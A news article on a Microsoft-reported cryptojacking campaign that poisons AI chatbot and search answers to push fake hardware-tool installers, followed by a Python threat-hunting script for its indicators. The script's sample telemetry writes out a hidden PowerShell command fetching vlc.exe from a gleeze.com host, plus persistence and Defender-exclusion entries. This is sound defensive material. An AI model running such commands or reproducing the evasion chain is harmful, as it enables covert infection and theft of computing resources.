AI Chatbot Recommendations Redirect Users To Cryptojacking Malware Sites, Microsoft Warns

Microsoft has warned of an active cryptojacking campaign in which threat actors use AI chatbot interactions to steer users toward malicious download sites hosting malware. According to Microsoft Defender Experts and the Microsoft Defender Security Research Team, this delivery method extends traditional social engineering beyond conventional search engine manipulation by getting malicious software recommendations directly into AI-generated responses. The attackers impersonate trusted system and hardware monitoring utilities such as CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear. Microsoft believes this choice of software is deliberate: people who install GPU stress-test and hardware-monitoring tools tend to own high-performance graphics processing units, so the campaign maximizes cryptocurrency mining output rather than infecting systems indiscriminately.

The campaign begins when a user asks an AI chatbot or a search engine where to download a trusted tool. Earlier waves of the activity relied on search engine optimization (SEO) poisoning to push malicious websites into search results. Microsoft observed that newer activity detected in April 2026 increasingly relied on large-language-model-based chatbots, with users who asked for download recommendations being handed attacker-controlled domains embedded inside the chatbot's answer. Researchers said this is consistent with emerging AI search result poisoning techniques. The practical point for users is that a chatbot naming a domain confers no trust on it; the vendor's own site remains the only safe source. The malicious websites carry download buttons that retrieve ZIP archives from campaign-specific subdomains of gleeze[.]com, a domain belonging to Dynu, a dynamic DNS provider frequently abused by threat actors. Microsoft said investigators identified more than 150 malicious domains distributing fake software installers.

Once downloaded, the ZIP archive contains a legitimate executable bundled with a malicious DLL named "autorun.dll"; when the user launches the program it sideloads the DLL from its own directory, so the malicious code runs under the name of the trusted application. The DLL then uses "msiexec.exe" to install a second malicious component, "vcredist_x64.dll", which ultimately deploys ScreenConnect, a legitimate remote-support tool, to establish persistent remote access to attacker-controlled infrastructure at "193.42.11[.]108". Microsoft reported that this remote access channel delivers an executable called "SimpleRunPE.exe", which establishes persistence through Registry Run keys and scheduled tasks and adds Microsoft Defender exclusions to avoid detection. The malware employs anti-analysis techniques and process hollowing to run its cryptocurrency miner inside trusted Microsoft-signed binaries, so the mining process appears in a process list as a legitimate Windows executable. In some cases, PowerShell scripts were also observed downloading malware under the disguised file name "vlc.exe" to evade detection and execute silently.

The malware supports multiple cryptocurrency mining programs, including gminer, lolMiner, and SRBMiner-MULTI, and continuously checks the infected system for analysis tools such as Windows Task Manager, Process Hacker, Process Explorer, and System Informer. If any of these is running, the malware immediately stops mining to avoid exposure. The practical consequence is that a user who opens Task Manager to investigate high GPU load will see nothing unusual; detection has to rely on recorded endpoint telemetry and the persistence artifacts rather than on live inspection. Microsoft stated that beyond financial gain, the attackers also keep long-term access to compromised systems, which could enable data theft, lateral movement, or ransomware activity. Separately, Microsoft disclosed additional investigations involving threat actors exploiting trusted relationships, including attacks on internet-facing F5 BIG-IP appliances, Linux systems, vulnerable Atlassian Confluence servers, and third-party IT providers to gain unauthorized access. Researchers advised organizations to validate trusted vendors, software recommendations, and integrated management tools more rigorously, and to monitor their environments continuously for suspicious behavior hidden inside legitimate services.
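As an added example (not Microsoft's tooling and not code from the article), the following Python hunts a constructed set of proxy and endpoint events for the stages the article lays out: the ZIP fetched from a gleeze[.]com subdomain, the autorun.dll sideload, msiexec being handed a DLL, the ScreenConnect connection to 193.42.11[.]108, SimpleRunPE.exe in Run keys and scheduled tasks, a new Defender exclusion, and PowerShell fetching a file named vlc.exe. The key=value event format, host names, file paths, task names and the msiexec switch are assumptions made for the demonstration; only the indicator values come from the article. Because the miner stops itself when Task Manager or a similar tool is opened, this kind of retrospective hunt over recorded telemetry is what actually surfaces the infection.

```python
"""Hunt endpoint and proxy telemetry for the artifacts described above.
Added example, not Microsoft's detection logic or the article's own code. The
key=value event format, hosts and paths are constructed; only the indicators are real."""
import re
from urllib.parse import urlsplit

C2_IP = "193.42.11.108"                  # ScreenConnect infrastructure named in the article
DDNS_APEX = "gleeze.com"                 # Dynu DDNS apex; ZIPs were served from its subdomains
SIDELOADED_DLL = "autorun.dll"           # loaded by the bundled legitimate EXE
PERSISTENCE_BINARIES = {"simplerunpe.exe", "vlc.exe"}   # Run-key / scheduled-task payloads
DOWNLOAD_VERBS = ("iwr", "invoke-webrequest", "downloadfile", "start-bitstransfer", "curl")
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse(line):
    """One 'type=... k=v k="v with spaces"' event -> dict (constructed format)."""
    return {k: quoted or bare for k, quoted, bare in _KV.findall(line)}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_ddns_download(ev):
    host = (urlsplit(ev.get("url", "")).hostname or "") if ev.get("type") == "proxy" else ""
    if host == DDNS_APEX or host.endswith("." + DDNS_APEX):
        return f"download from campaign DDNS host {host}"

def rule_c2(ev):
    if ev.get("type") == "netconn" and ev.get("dest") == C2_IP:
        return f"{basename(ev.get('process', ''))} connected to {C2_IP}"

def rule_sideload(ev):
    # autorun.dll loaded from outside the Windows directory, i.e. from beside a downloaded EXE
    image = ev.get("image", "")
    if (ev.get("type") == "imageload" and basename(image) == SIDELOADED_DLL
            and not image.lower().startswith("c:\\windows\\")):
        return f"{basename(ev.get('process', ''))} sideloaded {image}"

def rule_msiexec_dll(ev):
    # msiexec normally takes an .msi; a .dll on its command line matches the vcredist_x64.dll stage
    if (ev.get("type") == "process" and basename(ev.get("image", "")) == "msiexec.exe"
            and ".dll" in ev.get("cmdline", "").lower()):
        return f"msiexec handed a DLL: {ev['cmdline']}"

def rule_powershell_download(ev):
    cmd = ev.get("cmdline", "").lower()
    if (ev.get("type") == "process" and basename(ev.get("image", "")) == "powershell.exe"
            and "vlc.exe" in cmd and any(v in cmd for v in DOWNLOAD_VERBS)):
        return f"PowerShell fetched a file named vlc.exe: {ev['cmdline']}"

def rule_persistence(ev):
    if ev.get("type") == "registry" and "\\run" in ev.get("key", "").lower():
        target, where = ev.get("data", ""), ev["key"]
    elif ev.get("type") == "schtask":
        target, where = ev.get("action", ""), ev.get("task", "?")
    else:
        return None
    if basename(target) in PERSISTENCE_BINARIES:
        return f"{ev['type']} persistence {where} -> {target}"

def rule_defender_exclusion(ev):
    if ev.get("type") == "defender" and ev.get("event") == "ExclusionAdded":
        return f"Defender exclusion added for {ev.get('path')}"

RULES = [rule_ddns_download, rule_c2, rule_sideload, rule_msiexec_dll,
         rule_powershell_download, rule_persistence, rule_defender_exclusion]

def hunt(lines):
    """Return (host, rule name, evidence) triples for every rule that fires."""
    findings = []
    for ev in map(parse, lines):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((ev.get("host", "?"), rule.__name__, msg))
    return findings

def hosts_with_chain(findings, minimum=3):
    """Hosts where several distinct stages fired: one hit may be noise, the chain is not."""
    stages = {}
    for host, rule, _ in findings:
        stages.setdefault(host, set()).add(rule)
    return {h for h, s in stages.items() if len(s) >= minimum}

# Constructed sample telemetry: pc-gpu01 walks the full chain, pc-dev02 does ordinary things.
# Paths, task names and the msiexec switch are assumed; the article does not give them.
SAMPLE_TELEMETRY = [
    r'type=proxy host=pc-gpu01 url=https://crystaldiskinfo-dl.gleeze.com/CrystalDiskInfo.zip status=200',
    r'type=imageload host=pc-gpu01 process=C:\Users\u\Downloads\CrystalDiskInfo\DiskInfo64.exe image=C:\Users\u\Downloads\CrystalDiskInfo\autorun.dll',
    r'type=process host=pc-gpu01 image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /y C:\Users\u\AppData\Local\Temp\vcredist_x64.dll"',
    r'type=netconn host=pc-gpu01 process="C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe" dest=193.42.11.108 port=443',
    r'type=registry host=pc-gpu01 key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=GpuSvc data=C:\ProgramData\GpuSvc\SimpleRunPE.exe',
    r'type=schtask host=pc-gpu01 task=\GpuSvc action=C:\ProgramData\GpuSvc\SimpleRunPE.exe',
    r'type=defender host=pc-gpu01 event=ExclusionAdded path=C:\ProgramData\GpuSvc',
    r'type=process host=pc-gpu01 image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -w hidden -c iwr https://cdn-files.gleeze.com/vlc.exe -OutFile C:\ProgramData\GpuSvc\vlc.exe"',
    r'type=proxy host=pc-dev02 url=https://crystalmark.info/en/download/ status=200',
    r'type=registry host=pc-dev02 key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=OneDrive data=C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe',
    r'type=process host=pc-dev02 image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /i C:\Users\u\Downloads\tool.msi /qn"',
]

if __name__ == "__main__":
    for host, rule, evidence in hunt(SAMPLE_TELEMETRY):
        print(host, rule, evidence)
    print("hosts showing the chain:", hosts_with_chain(hunt(SAMPLE_TELEMETRY)))
```

Run as a script it prints eight hits, all on pc-gpu01, and none on pc-dev02. A single rule firing (a new Defender exclusion, one gleeze[.]com download) is a lead rather than a verdict, which is why hosts_with_chain reports only hosts where several distinct stages fired. Because the miner itself runs hollowed inside a signed Microsoft binary, matching on the miner's process name is the wrong place to start; the sideload, the persistence entries, the exclusion and the ScreenConnect connection are the durable indicators, and the rules above look only for those.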
